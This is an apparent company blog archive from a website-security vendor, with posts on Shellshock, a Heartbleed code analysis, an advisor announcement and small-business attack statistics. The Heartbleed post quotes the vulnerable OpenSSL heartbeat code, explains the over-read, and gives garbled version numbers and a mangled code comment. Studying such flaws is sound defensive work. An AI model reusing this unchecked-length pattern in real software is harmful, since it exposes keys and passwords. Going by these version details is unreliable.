26 09, 2014

6Scan Automatically Blocks Shellshock Attack Vectors



Shellshock is out, and it’s exactly the type of threat that reinforces the importance of real-time, proactive, automated security.

6Scan has developed solutions to protect our customers’ websites against Shellshock attack vectors and we will continue to automatically update our active subscribers as new vectors emerge.

Through our patent-pending automated website security we are able to define common attack vectors and filter out malicious traffic designed to exploit websites that are exposed to this vulnerability. As new attack vectors emerge we will continue to update our security in real-time.

Shellshock details

The vulnerability comes from a weakness in the GNU Bourne Again Shell (Bash), the text-based, command-line utility on multiple Linux and Unix operating systems. Researchers discovered that if Bash is set up to be the default command line utility on these systems, it opens those systems up to specially crafted remote attacks via a range of network tools that rely on it to execute scripts, from telnet and secure shell (SSH) sessions to Web requests. The vulnerability is summarized here.

The Guardian website has a good non-jargon write up and, as usual, Krebs on Security  has good coverage including this warning:

“The bug is being compared to the recent Heartbleed vulnerability because of its ubiquity and sheer potential for causing havoc on Internet-connected systems — particularly Web sites. Worse yet, experts say the official patch for the security hole is incomplete and could still let attackers seize control over vulnerable systems.”

Stay safe.

8 04, 2014

OpenSSL Heartbleed Bug Analysis


Yesterday the security engineers at Codenomicon disclosed a high severity security vulnerability in one of the most used SSL libraries in the world – OpenSSL.

According to advisory published on openssl.org the vulnerability exists on 1.0.1, 1.02-beta, 1.01f and 1.02-beta1 versions and seems to impact millions of servers, please upgrade to the latest version of openSSL 1.0.1g.

What’s Heartbleed bug?

OpenSSL implements Transport Layer Security (TLS) and Datagram Transport Layer Security (DTLS) protocols which designed to secure traffic from unauthorized attackers. An extension called Heartbeat is being used to keep connection alive between client and server that use TLS connections, the security vulnerability found in that extension and that’s the reason the researches named the bug as “Heartbleed”.

How the bug behaves

We downloaded the latest version with the security fix (1.0.1g) and one version before (1.0.2-beta1), searched for the function who handles the process of heartbeat extension, and performed a diff between the two versions.



* Comparison between vulnerable OpenSSL 1.0.2-beta1 against the latest fixed version 1.0.1g (Click on the picture above to see it correctly)

From the above comparison we can learn a lot about the heartbleed security bug, on the left you can see the old vulnerable version:

/* Read type and payload length first */

hbtype = *p++;
n2s(p, payload);
pl = p;

The first line, extracts the type of the heartbeat message received, second line extracts from received message the length of the received message, the code doesn’t check if the length given by the remote client is correct.

/* Allocate memory for the response, size is 1 bytes
* message type, plus 2 bytes payload length, plus
* payload, plus padding
buffer = OPENSSL_malloc(1 + 2 + payload + padding);
bp = buffer;

/* Enter response type, length and copy payload */
s2n(payload, bp);
memcpy(bp, pl, payload);
bp += payload;
/* Random padding */
RAND_pseudo_bytes(bp, padding);

r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);

As we can see later on that function, it allocates memory based on the given unchecked length from the remote client, generates a response and send it back to the remote client. That means we can actually give length up to 65K without providing a message in that size, then the function will build response message and try to copy payload in the size provided by the client, that will cause copy of 65K of memory that may contain important information about the server such as encryption keys, user names password, etc.


We highly recommend for all sys admins to check and verify they have the latest version of openSSL (1.01g), in the near future it seems we’ll have a lot of interesting stories about it, hold tight.

23 02, 2014

Security and Simplicity

We’re excited to announce the addition of  Gregor Freund as a 6Scan board advisor. Gregor, who was also a participant in our most recent funding round,  brings tremendous security insight and experience as 6Scan  continues to grow (250,000+ active websites!) and expand our services.

I’ve known Gregor since 2000, when he was running Zone Labs out of an office jammed between a reggae club and a highway off-ramp.  Gregor had positioned the company as a pioneer in desktop firewalls and freemium security. I was taking on the challenge of expanding the free user base and driving conversion to paid products (some details in this video). Over the next 4 years, Gregor grew the company to 200 employees before selling the business to Check Point.

I learned a lot at Zone Labs, the most enduring lesson being the importance of simplicity. At 6Scan our community is not based on security expertise, it’s based on passion. Our users are passionate about their businesses, their interests and their opinions – and their websites reflect that. And that’s what drives us – simplifying an essential and often complex process so our users can focus on running their businesses. Our community shouldn’t be distracted by security (nor from being victimized by cyber criminals). And that’s our goal in 2014, to keep it simple and, whenever possible, keep it free.

12 11, 2013

How does an attack work?

At 6Scan we’re focused on protecting small businesses against website attacks. One way we protect our customers is by monitoring what requests are being made to their website. When a visitor to your site clicks on a link, they are making a request for the content on that page to be loaded to their browser. When a hacker makes a request to see if they can upload a virus to your website, we catch and categorize it as a malicious request. On your 6Scan dashboard it will show up as ‘Threat’ traffic.

Across all the sites we protect, we see that an average of 7% of requests are malicious. That means a website getting 350 daily requests is averaging 1 hack attempt per hour, every hour, every day. This is why it’s important stay on top of your site security, hackers are always ready to exploit exposed areas.

8 06, 2013

So, who needs web security?

If you run your own website, you need to protect it. It is just like locking your door, installing a car alarm or putting a password on your computer. We’ve all seen recent headlines about cyber attacks on major companies like Sony, LinkedIn, and Facebook. But these kinds of attacks are rare. Large corporate attacks are like someone trying to break into the Louvre to steal the Mona Lisa. This is potentially incredibly lucrative, but it is also incredibly challenging for the thief. Thieves are typically not that ambitious; most theft occurs when the thief sees a combination of opportunity and vulnerability (like breaking into a home, stealing a car or snatching a purse from a pedestrian). In cyber life, we see the same kind of behavior with malicious hackers and small businesses.

According to the 2012 Verizon Data Breach Investigations Report, small businesses are the preferred target for malicious hackers. Criminal hackers who target small business don’t do it for the attention; they want to fly below the radar, so they hack into as many sites as possible and steal whatever information they can from the websites they target. And attacks against small business are very common. According to 6Scan data, 7% of website requests are malicious. This translates to a website that receives 350 daily visits averages 1 hack attempt per hour, every hour, of every day. Some of these attempts will not be successful, but others may be.

Some of you have been using 6Scan for some time, and you know what it’s about. For those of you who are new to 6Scan, here is a quick summary: 6Scan tells you if your website is vulnerable for attack by hackers and provides the information detailing your site vulnerability to you for free. You then have the option to address the exposed areas on your own, or (for the less tech-savvy or time restricted individuals) you can pay a small subscription fee so that 6Scan can automatically fix vulnerabilities for you, and if necessary remove malware.

Let’s recap. Who needs website security? Technically, everyone… but small business owners need to be even more careful to not become the target of a mischievous hacker. 6Scan can help give you peace of mind, so that you can continue on with what is important…running your business.